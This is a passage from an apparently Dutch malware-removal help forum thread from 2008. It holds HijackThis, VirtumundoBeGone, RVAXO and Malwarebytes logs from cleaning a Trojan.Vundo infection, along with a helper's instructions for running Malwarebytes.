      O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe
      O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
      O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
      O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s
      O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
      O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
      O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
      O4 - HKCU\..\Run: [LClock] C:\Program Files\LClock\LClock.exe
      O4 - HKCU\..\Run: [Vista Sidebar] C:\Program Files\Vista Sidebar\sidebar.exe
      O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
      O4 - HKCU\..\Run: [ViOrb] C:\Program Files\ViOrb\ViOrb.exe
      O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
      O4 - HKCU\..\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
      O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
      O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Lokale service')
      O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Netwerkservice')
      O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
      O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
      O4 - Global Startup: Adobe Acrobat Speed Launcher.lnk = ?
      O4 - Global Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
      O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
      O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
      O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
      O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
      O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
      O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
      O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
      O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
      O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
      O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
      O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
      O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
      O9 - Extra button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe
      O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
      O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
      O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
      O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201884219671
      O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
      O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
      O16 - DPF: {D83C1BD1-DCBB-11D4-9425-0050BF33FA6E} (CycloScopeLite Control) - http://www.cyclomedia.nl/download/components/CycloScopeLite.cab
      O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
      O22 - SharedTaskScheduler: Preloader van browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
      O22 - SharedTaskScheduler: Cache-daemon voor onderdeelcategorieën - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
      O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
      O23 - Service: Adobe Version Cue CS2 - Adobe Systems Incorporated - C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
      O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
      O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
      O23 - Service: Norman eLogger service 6 (eLoggerSvc6) - Norman ASA - C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
      O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
      O23 - Service: iPod-service (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
      O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
      O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
      O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
      O23 - Service: Norman NJeeves - Unknown owner - C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
      O23 - Service: Norman ZANDA - Norman ASA - C:\Program Files\Norman\Npm\Bin\Zanda.exe
      O23 - Service: Norman Virus Control on-access component (nvcoas) - Norman ASA - C:\Program Files\Norman\Nvc\bin\nvcoas.exe
      O23 - Service: Norman Virus Control Scheduler (NVCScheduler) - Norman ASA - C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
      O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
      O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
      O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe

      --
      End of file - 13113 bytes



      VBG

      [03/23/2008, 15:21:52] - VirtumundoBeGone v1.5 ( "C:\Documents and Settings\Jeroen\Bureaublad\VirtumundoBeGone.exe" )
      [03/23/2008, 15:21:54] - Detected System Information:
      [03/23/2008, 15:21:54] - Windows Version: 5.1.2600, Service Pack 2
      [03/23/2008, 15:21:54] - Current Username: Jeroen (Admin)
      [03/23/2008, 15:21:54] - Windows is in NORMAL mode.
      [03/23/2008, 15:21:54] - Searching for Browser Helper Objects:
      [03/23/2008, 15:21:54] - BHO 1: {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (AcroIEHlprObj Class)
      [03/23/2008, 15:21:54] - BHO 2: {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} ()
      [03/23/2008, 15:21:54] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:54] - Checking for HKLM\...\Winlogon\Notify\hgggffg
      [03/23/2008, 15:21:54] - Found: HKLM\...\Winlogon\Notify\hgggffg - This is probably Virtumundo.
      [03/23/2008, 15:21:54] - Assigning {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} MSEvents Object
      [03/23/2008, 15:21:54] - BHO list has been changed! Starting over...
      [03/23/2008, 15:21:54] - BHO 1: {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (AcroIEHlprObj Class)
      [03/23/2008, 15:21:54] - BHO 2: {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} (MSEvents Object)
      [03/23/2008, 15:21:54] - ALERT: Found MSEvents Object!
      [03/23/2008, 15:21:54] - BHO 3: {4E138131-FDFB-42EB-B92D-2BB0975448BB} ()
      [03/23/2008, 15:21:54] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:54] - Checking for HKLM\...\Winlogon\Notify\mlljh
      [03/23/2008, 15:21:54] - Key not found: HKLM\...\Winlogon\Notify\mlljh, continuing.
      [03/23/2008, 15:21:54] - BHO 4: {53707962-6F74-2D53-2644-206D7942484F} ()
      [03/23/2008, 15:21:54] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:54] - Checking for HKLM\...\Winlogon\Notify\SDHelper
      [03/23/2008, 15:21:54] - Key not found: HKLM\...\Winlogon\Notify\SDHelper, continuing.
      [03/23/2008, 15:21:54] - BHO 5: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} (SSVHelper Class)
      [03/23/2008, 15:21:54] - BHO 6: {9030D464-4C02-4ABF-8ECC-5164760863C6} (Windows Live Aanmelden - Help)
      [03/23/2008, 15:21:54] - BHO 7: {AA58ED58-01DD-4d91-8333-CF10577473F7} (Google Toolbar Helper)
      [03/23/2008, 15:21:54] - BHO 8: {AE7CD045-E861-484f-8273-0445EE161910} (AcroIEToolbarHelper Class)
      [03/23/2008, 15:21:54] - BHO 9: {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} (Google Toolbar Notifier BHO)
      [03/23/2008, 15:21:54] - Finished Searching Browser Helper Objects
      [03/23/2008, 15:21:54] - *** Detected MSEvents Object
      [03/23/2008, 15:21:54] - Trying to remove MSEvents Object...
      [03/23/2008, 15:21:55] - Terminating Process: IEXPLORE.EXE
      [03/23/2008, 15:21:56] - Terminating Process: RUNDLL32.EXE
      [03/23/2008, 15:21:57] - Disabling Automatic Shell Restart
      [03/23/2008, 15:21:57] - Terminating Process: EXPLORER.EXE
      [03/23/2008, 15:21:58] - Suspending the NT Session Manager System Service
      [03/23/2008, 15:21:58] - Terminating Windows NT Logon/Logoff Manager
      [03/23/2008, 15:21:58] - Re-enabling Automatic Shell Restart
      [03/23/2008, 15:21:59] - File to disable: C:\WINDOWS\system32\hgggffg.dll
      [03/23/2008, 15:21:59] - Renaming C:\WINDOWS\system32\hgggffg.dll -> C:\WINDOWS\system32\hgggffg.dll.vir
      [03/23/2008, 15:21:59] - File successfully renamed!
      [03/23/2008, 15:21:59] - Removing HKLM\...\Browser Helper Objects\{3055295A-CCDD-44B2-9F73-D8E8E626E5C1}
      [03/23/2008, 15:21:59] - Removing HKCR\CLSID\{3055295A-CCDD-44B2-9F73-D8E8E626E5C1}
      [03/23/2008, 15:21:59] - Adding Kill Bit for ActiveX for GUID: {3055295A-CCDD-44B2-9F73-D8E8E626E5C1}
      [03/23/2008, 15:21:59] - Deleting ATLEvents/MSEvents Registry entries
      [03/23/2008, 15:21:59] - Removing HKLM\...\Winlogon\Notify\hgggffg
      [03/23/2008, 15:21:59] - Searching for Browser Helper Objects:
      [03/23/2008, 15:21:59] - BHO 1: {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (AcroIEHlprObj Class)
      [03/23/2008, 15:21:59] - BHO 2: {4E138131-FDFB-42EB-B92D-2BB0975448BB} ()
      [03/23/2008, 15:21:59] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:59] - Checking for HKLM\...\Winlogon\Notify\mlljh
      [03/23/2008, 15:21:59] - Key not found: HKLM\...\Winlogon\Notify\mlljh, continuing.
      [03/23/2008, 15:21:59] - BHO 3: {53707962-6F74-2D53-2644-206D7942484F} ()
      [03/23/2008, 15:21:59] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:59] - Checking for HKLM\...\Winlogon\Notify\SDHelper
      [03/23/2008, 15:21:59] - Key not found: HKLM\...\Winlogon\Notify\SDHelper, continuing.
      [03/23/2008, 15:21:59] - BHO 4: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} (SSVHelper Class)
      [03/23/2008, 15:21:59] - BHO 5: {9030D464-4C02-4ABF-8ECC-5164760863C6} (Windows Live Aanmelden - Help)
      [03/23/2008, 15:21:59] - BHO 6: {AA58ED58-01DD-4d91-8333-CF10577473F7} (Google Toolbar Helper)
      [03/23/2008, 15:21:59] - BHO 7: {AE7CD045-E861-484f-8273-0445EE161910} (AcroIEToolbarHelper Class)
      [03/23/2008, 15:21:59] - BHO 8: {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} (Google Toolbar Notifier BHO)
      [03/23/2008, 15:21:59] - Finished Searching Browser Helper Objects
      [03/23/2008, 15:21:59] - Finishing up...
      [03/23/2008, 15:21:59] - A restart is needed.
      [03/23/2008, 15:22:07] - Attempting to Restart via STOP error (Blue Screen!)



      RVAXO log:
      ---RVAXO.exe Updated: 2008-03-21---first run---
      Uninstallers:

      Files found:
      C:\WINDOWS\system32\hgggffg.dll.vir
      C:\WINDOWS\system32\hjllm.ini2
      C:\WINDOWS\pskt.ini

      Folders Found:

      Hosts-file was reset, If you use a custom hosts file please replace it...

      --------------RVAXO.exe last run---------------
      Not deleted items:

      --------------RVAXO.exe finished----------------


      • #4
        Download Malwarebytes' Anti-Malware to your desktop.
        Double-click mbam-setup.exe and choose "Next" to install the tool.
        When the installation is complete, tick "Update MalwareBytes' Anti-Malware" and "Launch MalwareBytes' Anti-Malware".
        Then press "Finish".
        In the main window, choose the "Scanner" tab and select the "Perform full scan" radio button.
        Press the "Scan" button and make sure all your hard drives/partitions are ticked.
        Then press the "Start Scan" button.
        When the scan is complete, click OK, then "Show Results" to see the results.
        Make sure everything is ticked, then click "Remove Selected".
        If the program wants to restart your computer, allow it.
        A log then opens (mbam-log-XX-XX-XXXX(xx-xx-xx).txt).
        Post this log in your next message together with a new HijackThis log.


        • #5
          Malwarebytes' Anti-Malware 1.09
          Database versie: 524

          Scan type: Volledige Scan (A:\|C:\|E:\|F:\|G:\|H:\|)
          Objecten gescand: 196911
          Verstreken tijd: 37 minute(s), 54 second(s)

          Geheugenprocessen geïnfecteerd: 0
          Geheugenmodulen geïnfecteerd: 1
          Registersleutels geïnfecteerd: 12
          Registerwaarden geïnfecteerd: 0
          Registerdata bestanden geïnfecteerd: 2
          Mappen geïnfecteerd: 0
          Bestanden geïnfecteerd: 7

          Geheugenprocessen geïnfecteerd:
          (Geen kwaadaardige items gevonden)

          Geheugenmodulen geïnfecteerd:
          C:\WINDOWS\system32\mlljh.dll (Trojan.Vundo) -> Unloaded module successfully.

          Registersleutels geïnfecteerd:
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7260dbe4-2626-4ff2-934a-f91e5199810c} (Trojan.Vundo) -> Delete on reboot.
          HKEY_CLASSES_ROOT\CLSID\{7260dbe4-2626-4ff2-934a-f91e5199810c} (Trojan.Vundo) -> Delete on reboot.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\aoprndtws (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CURRENT_USER\Software\Microsoft\aldd (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CURRENT_USER\Software\Microsoft\affri (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CURRENT_USER\Software\Microsoft\affltid (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CLASSES_ROOT\WR (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CURRENT_USER\Software\Microsoft\rdfa (Trojan.Vundo) -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\affltid (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\affri (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\FCOVM (Trojan.Vundo) -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemoveRP (Trojan.Vundo) -> Quarantined and deleted successfully.

          Registerwaarden geïnfecteerd:
          (Geen kwaadaardige items gevonden)

          Registerdata bestanden geïnfecteerd:
          HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\Authentication Packages (Trojan.Vundo) -> Data: c:\windows\system32\mlljh.dll -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages (Trojan.Vundo) -> Data: c:\windows\system32\mlljh.dll -> Quarantined and deleted successfully.

          Mappen geïnfecteerd:
          (Geen kwaadaardige items gevonden)

          Bestanden geïnfecteerd:
          C:\WINDOWS\system32\mlljh.dll (Trojan.Vundo) -> Delete on reboot.
          C:\WINDOWS\system32\hjllm.ini (Trojan.Vundo) -> Quarantined and deleted successfully.
          C:\WINDOWS\system32\hjllm.ini2 (Trojan.Vundo) -> Quarantined and deleted successfully.
          C:\WINDOWS\system32\xuurokys.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
          C:\WINDOWS\system32\sykoruux.ini (Trojan.Vundo) -> Quarantined and deleted successfully.
          C:\Documents and Settings\Jeroen\Local Settings\Temporary Internet Files\Content.IE5\WKG9GPG6\17PHolmes[1].cmt (Trojan.Downloader) -> Quarantined and deleted successfully.
          C:\System Volume Information\_restore{4295E15E-1BA4-4688-A8CC-E5BE6D956022}\RP27\A0003363.exe (Trojan.Downloader) -> Quarantined and deleted successfully.


          HiJackThis LOG
          Logfile of Trend Micro HijackThis v2.0.0 (BETA)
          Scan saved at 18:31:29, on 23-3-2008
          Platform: Windows XP SP2 (WinNT 5.01.2600)
          Boot mode: Normal

          Running processes:
          C:\WINDOWS\System32\smss.exe
          C:\WINDOWS\system32\csrss.exe
          C:\WINDOWS\system32\winlogon.exe
          C:\WINDOWS\system32\services.exe
          C:\WINDOWS\system32\lsass.exe
          C:\WINDOWS\system32\Ati2evxx.exe
          C:\WINDOWS\system32\svchost.exe
          C:\WINDOWS\system32\svchost.exe
          C:\Program Files\Windows Defender\MsMpEng.exe
          C:\WINDOWS\System32\svchost.exe
          C:\WINDOWS\system32\Ati2evxx.exe
          C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
          C:\Program Files\Norman\Npm\Bin\Zanda.exe
          C:\WINDOWS\system32\svchost.exe
          C:\WINDOWS\system32\svchost.exe
          C:\WINDOWS\system32\spoolsv.exe
          C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
          C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
          C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
          C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
          C:\WINDOWS\system32\svchost.exe
          C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
          C:\Program Files\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
          C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
          C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
          C:\Program Files\Norman\Nvc\bin\nvcoas.exe
          C:\WINDOWS\System32\alg.exe
          C:\WINDOWS\Explorer.EXE
          C:\WINDOWS\RTHDCPL.EXE
          C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE
          C:\Program Files\Windows Defender\MSASCui.exe
          C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
          C:\Program Files\Norman\Npm\bin\ZLH.EXE
          C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe
          C:\Program Files\Norman\Nvc\BIN\NIP.EXE
          C:\Program Files\Norman\Nvc\bin\cclaw.exe
          C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
          C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
          C:\WINDOWS\system32\wbem\wmiprvse.exe
          C:\Program Files\iTunes\iTunesHelper.exe
          C:\Program Files\Winamp\winampa.exe
          C:\WINDOWS\system32\Rundll32.exe
          C:\WINDOWS\system32\ctfmon.exe
          C:\Program Files\Skype\Phone\Skype.exe
          C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
          C:\Program Files\iPod\bin\iPodService.exe
          C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe
          C:\Program Files\Messenger\msmsgs.exe
          C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\acrobat_sl.exe
          C:\Program Files\Google\Google Updater\GoogleUpdater.exe
          C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
          C:\WINDOWS\system32\wuauclt.exe
          C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
          C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
          C:\Program Files\Skype\Plugin Manager\skypePM.exe
          C:\Program Files\Mozilla Firefox\firefox.exe
          C:\Documents and Settings\Jeroen\Bureaublad\HiJackThis_v2.exe

          R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.pokerweblogs.com/
          R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
          R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
          R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
          R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
          R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
          F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
          O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Adobe Acrobat 7.0\ActiveX\AcroIEHelper.dll
          O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
          O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
          O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
          O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
          O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
          O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.1119.1736\swg.dll
          O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
          O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
          O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\CLIStart.exe"
          O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
          O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
          O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
          O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
          O4 - HKLM\..\Run: [Norman ZANDA] C:\Program Files\Norman\Npm\bin\ZLH.EXE /LOAD /SPLASH
          O4 - HKLM\..\Run: [OpwareSE2] "C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe"
          O4 - HKLM\..\Run: [Thunderbird] "C:\Program Files\Mozilla Thunderbird\thunderbird.exe"
          O4 - HKLM\..\Run: [Adobe Version Cue CS2] "C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe"
          O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe"
          O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
          O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
          O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
          O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
          O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
          O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
          O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe
          O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
          O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
          O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s
          O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
          O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
          O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
          O4 - HKCU\..\Run: [LClock] C:\Program Files\LClock\LClock.exe
          O4 - HKCU\..\Run: [Vista Sidebar] C:\Program Files\Vista Sidebar\sidebar.exe
          O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
          O4 - HKCU\..\Run: [ViOrb] C:\Program Files\ViOrb\ViOrb.exe
          O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
          O4 - HKCU\..\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
          O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
          O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Lokale service')
          O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Netwerkservice')
          O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
          O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
          O4 - Global Startup: Adobe Acrobat Speed Launcher.lnk = ?
          O4 - Global Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
          O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
          O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
          O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
          O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
          O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
